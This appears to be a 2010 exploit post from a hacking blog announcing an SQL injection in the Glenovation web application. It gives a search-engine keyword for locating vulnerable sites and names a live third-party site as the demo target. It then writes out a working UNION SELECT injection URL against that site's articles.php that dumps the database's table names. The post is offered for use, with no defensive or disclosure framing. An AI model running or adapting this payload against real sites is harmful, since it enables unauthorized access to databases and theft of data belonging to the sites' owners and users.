~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Glenovation
|~Price : N/A
|~Version : N/A
|~Software: http://www.glenovation.com
|~Vulnerability Style : Based SQL Injection
|~Vulnerability Dir : /
|~sqL : MysqL Based Error
|~Google Keyword : "Powered by Glenovation"
|[~]Date : "25.11.2010"
|[~]Tested on : (L):Vista (R):Apache/2 PHP/5.2.14 MySQL >=5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://www.companyregistry.eu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| indexlight.php SQL Injection~~~~~~~~~~~}|
http://$Site/$path/articles.php?id=2 {SQL Injection}
Ex; http://www.companyregistry.eu
[~] SQL Injecting
http://www.companyregistry.eu/articles.php?id=2 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from information_schema.tables where table_schema=database()
[~] Need : data for http live Header. <= use
To your continue..
=============================================================
gOODLuck;)
Vulnerability Researching, Shellcode, PoC, Exploits, Zeroday, h4 SEC
25 Kasım 2010 Perşembe
Glenovation <= Based SQL Injection Vulnerability
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder